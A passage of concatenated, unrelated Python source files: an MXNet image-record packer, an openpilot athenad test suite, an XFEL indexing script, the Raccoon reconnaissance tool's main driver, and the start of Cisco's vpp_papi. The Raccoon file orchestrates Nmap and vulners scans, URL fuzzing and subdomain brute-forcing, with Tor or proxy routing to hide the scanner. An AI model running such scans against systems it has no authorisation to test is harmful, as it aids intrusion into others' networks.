line_len = len(line)
if line_len < 3:
print('lst should at least has three parts, but only has %s parts for %s' %(line_len, line))
continue
try:
item = [int(line[0])] + [line[-1]] + [float(i) for i in line[1:-1]]
except Exception, e:
print('Parsing lst met error for %s, detail: %s' %(line, e))
continue
yield item
def image_encode(args, i, item, q_out):
fullpath = os.path.join(args.root, item[1])
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
if args.pass_through:
try:
with open(fullpath) as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, item))
except Exception, e:
traceback.print_exc()
print('pack_img error:', item[1], e)
q_out.put((i, None, item))
return
try:
img = cv2.imread(fullpath, args.color)
except:
traceback.print_exc()
print('imread error trying to load file: %s ' % fullpath)
q_out.put((i, None, item))
return
if img is None:
print('imread read blank (None) image for file: %s' % fullpath)
q_out.put((i, None, item))
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
margin = (img.shape[0] - img.shape[1]) / 2;
img = img[margin:margin + img.shape[1], :]
else:
margin = (img.shape[1] - img.shape[0]) / 2;
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize / img.shape[1])
else:
newsize = (img.shape[1] * args.resize / img.shape[0], args.resize)
img = cv2.resize(img, newsize)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, item))
except Exception, e:
traceback.print_exc()
print('pack_img error on file: %s' % fullpath, e)
q_out.put((i, None, item))
return
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--pass-through', type=bool, default=False,
help='whether to skip transformation and save image as is')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', type=bool, default=False,
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
import Queue
q_out = Queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
test_athenad.py
|
#!/usr/bin/env python3
import json
import os
import requests
import shutil
import tempfile
import time
import threading
import queue
import unittest
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from selfdrive import swaglog
from selfdrive.athena import athenad
from selfdrive.athena.athenad import MAX_RETRY_COUNT, dispatcher
from selfdrive.athena.tests.helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.ROOT = tempfile.mkdtemp()
athenad.SWAGLOG_DIR = swaglog.SWAGLOG_DIR = tempfile.mkdtemp()
athenad.Params = MockParams
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = set([cls.SOCKET_PORT])
def tearDown(self):
athenad.upload_queue = queue.Queue()
athenad.cur_upload_items.clear()
for i in os.listdir(athenad.ROOT):
p = os.path.join(athenad.ROOT, i)
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.unlink(p)
def wait_for_upload(self):
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_deviceState():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("deviceState")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message('deviceState')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_deviceState)
p.start()
time.sleep(0.1)
try:
deviceState = dispatcher["getMessage"]("deviceState")
assert deviceState['deviceState']
finally:
p.terminate()
def test_listDataDirectory(self):
route = '2021-03-29--13-32-47'
segments = [0, 1, 2, 3, 11]
filenames = ['qlog.bz2', 'qcamera.ts', 'rlog.bz2', 'fcamera.hevc', 'ecamera.hevc', 'dcamera.hevc']
files = [f'{route}--{s}/{f}' for s in segments for f in filenames]
for file in files:
fn = os.path.join(athenad.ROOT, file)
os.makedirs(os.path.dirname(fn), exist_ok=True)
Path(fn).touch()
resp = dispatcher["listDataDirectory"]()
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, files)
resp = dispatcher["listDataDirectory"](f'{route}--123')
self.assertCountEqual(resp, [])
prefix = f'{route}'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/q'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
with self.assertRaises(requests.exceptions.ConnectionError):
athenad._do_upload(item)
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, 404)
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['item'])
self.assertIsNotNone(resp['item'].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
# TODO: verify that upload actually succeeded
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
def test_upload_handler_timeout(self):
"""When an upload times out or fails to connect it should be placed back in the queue"""
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
item_no_retry = item._replace(retry_count=MAX_RETRY_COUNT)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item_no_retry)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload with retry count exceeded is not put back
self.assertEqual(athenad.upload_queue.qsize(), 0)
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload item was put back in the queue with incremented retry count
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
finally:
end_event.set()
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
def test_listUploadQueueEmpty(self):
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 0)
@with_http_server
def test_listUploadQueueCurrent(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertTrue(items[0]['current'])
finally:
end_event.set()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
self.assertFalse(items[0]['current'])
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_getVersion(self):
resp = dispatcher["getVersion"]()
keys = ["version", "remote", "branch", "commit"]
self.assertEqual(list(resp.keys()), keys)
for k in keys:
self.assertIsInstance(resp[k], str, f"{k} is not a string")
self.assertTrue(len(resp[k]) > 0, f"{k} has no value")
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
try:
# with params
athenad.recv_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
# without params
athenad.recv_queue.put_nowait(json.dumps({"method": "getNetworkType", "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 1, 'id': 0, 'jsonrpc': '2.0'})
# log forwarding
athenad.recv_queue.put_nowait(json.dumps({'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'}))
resp = athenad.log_recv_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
def test_get_logs_to_send_sorted(self):
fl = list()
for i in range(10):
fn = os.path.join(swaglog.SWAGLOG_DIR, f'swaglog.{i:010}')
Path(fn).touch()
fl.append(os.path.basename(fn))
# ensure the list is all logs except most recent
sl = athenad.get_logs_to_send_sorted()
self.assertListEqual(sl, fl[:-1])
if __name__ == '__main__':
unittest.main()
|
cxi_index.py
|
from __future__ import division
# LIBTBX_SET_DISPATCHER_NAME cxi.index
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT
from xfel.cxi.display_spots import run_one_index
from libtbx.utils import Usage, Sorry
import libtbx.option_parser
import sys,os
if (__name__ == "__main__"):
command_line = (libtbx.option_parser.option_parser(
usage="%s [-d] [-s] [-n num_procs] [-o output_dir] [-b output_basename] [-e extension] target=targetpath files" % libtbx.env.dispatcher_name,
more_help=["Target: the phil file containing further indexing/integration parameters"])
.option(None, "--no_display", "-d",
action="store_true",
default=False,
dest="no_display",
help="Do not show indexing graphics")
.option(None, "--skip_processed", "-s",
action="store_true",
default=False,
dest="skip_processed",
help="Skip files that have alread been processed")
.option(None, "--num_procs", "-n",
type="int",
default=1,
dest="num_procs",
help="Number of processors to use")
.option(None, "--output_dir", "-o" ,
type="string",
default=None,
dest="output_dir",
help="Directory for integration pickles")
.option(None, "--output_basename", "-b",
type="string",
default="int_",
dest="output_basename",
help="String to append to the front of output integration pickles")
.option(None, "--extension", "-e",
type="string",
default=".pickle",
dest="extension",
help="File extension use to filter input files if a directory is given as input")
).process(args=sys.argv[1:])
files = [arg for arg in command_line.args if os.path.isfile(arg)]
dirs = [arg for arg in command_line.args if os.path.isdir(arg)]
for directory in dirs:
for path in os.listdir(directory):
if os.path.splitext(path)[1] == command_line.options.extension:
files.append(os.path.join(directory, path))
arguments = [arg for arg in command_line.args if not os.path.isfile(arg) and not os.path.isdir(arg)]
found_it = False
for arg in arguments:
if "target=" in arg:
found_it = True
break
if not found_it:
raise Usage(command_line.parser.usage)
if command_line.options.no_display:
display = False
arguments.append('--nodisplay')
else:
display = True
assert command_line.options.num_procs > 0
if command_line.options.output_dir is not None and \
not os.path.isdir(command_line.options.output_dir):
raise Sorry("Output dir %s doesn't exist"%command_line.options.output_dir)
def do_work(item):
file, arguments, kwargs = item
try:
run_one_index(file, *arguments, **({'display':display}))
except Exception as e:
if hasattr(e, "classname"):
print e.classname, "for %s:"%file,
else:
print "Indexing error for %s:"%file,
print e
if command_line.options.num_procs == 1:
for file in files:
if command_line.options.output_dir is not None:
int_pickle_path = os.path.join(command_line.options.output_dir, \
command_line.options.output_basename + os.path.basename(file))
if command_line.options.skip_processed and os.path.isfile(int_pickle_path):
print file, "already processed, skipping"
continue
arguments.append("indexing.completeness_pickle=%s"%int_pickle_path)
do_work((file, arguments, ({'display':display})))
else:
import multiprocessing, copy
def worker():
for item in iter( q.get, None ):
do_work(item)
q.task_done()
q.task_done()
q = multiprocessing.JoinableQueue()
procs = []
for i in range(command_line.options.num_procs):
procs.append(multiprocessing.Process(target=worker))
procs[-1].daemon = True
procs[-1].start()
for file in files:
if command_line.options.output_dir is not None:
int_pickle_path = os.path.join(command_line.options.output_dir, \
command_line.options.output_basename + os.path.basename(file))
if command_line.options.skip_processed and os.path.isfile(int_pickle_path):
print file, "already processed, skipping"
continue
args = copy.copy(arguments)
args.append("indexing.completeness_pickle=%s"%int_pickle_path)
else:
args = arguments
q.put((file, args, ({'display':display})))
q.join()
for p in procs:
q.put( None )
q.join()
for p in procs:
p.join()
print "Finished everything...."
print "num active children:", len(multiprocessing.active_children())
|
main.py
|
import time
import asyncio
import threading
import click
import os
import sys
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.5")
@click.argument("target")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("-h", "--headers", help="Comma separated headers to add to the requests. "
"Should be in the form of key:value\n"
"Example: Authorization:12345,x-something:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "raccoon_src/wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "raccoon_src/wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan. "
"Runs instead of the regular Nmap scan and is longer.")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "raccoon_src/utils/misc/vulners.nse"),
help="Path to the custom nmap_vulners.nse script."
"If not used, Raccoon uses the built-in script it ships with.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
headers,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
if 'win32' in sys.platform:
main_loop = asyncio.ProactorEventLoop()
asyncio.set_event_loop(main_loop)
else:
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host=host, port_range=port, vulners_path=vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(
host=host,
port_range=port,
full_scan=full_scan,
scripts=scripts,
services=services)
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
if headers:
try:
headers = HelpUtilities.parse_header_arg(headers)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host, headers)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
# asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
if __name__ == "__main__":
main()
|
vpp_papi.py
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import sys
import multiprocessing as mp
import os
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
from . vpp_serializer import VPPType, VPPEnumType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
logger = logging.getLogger(__name__)
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
__all__ = ('FuncWrapper', 'VPP', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
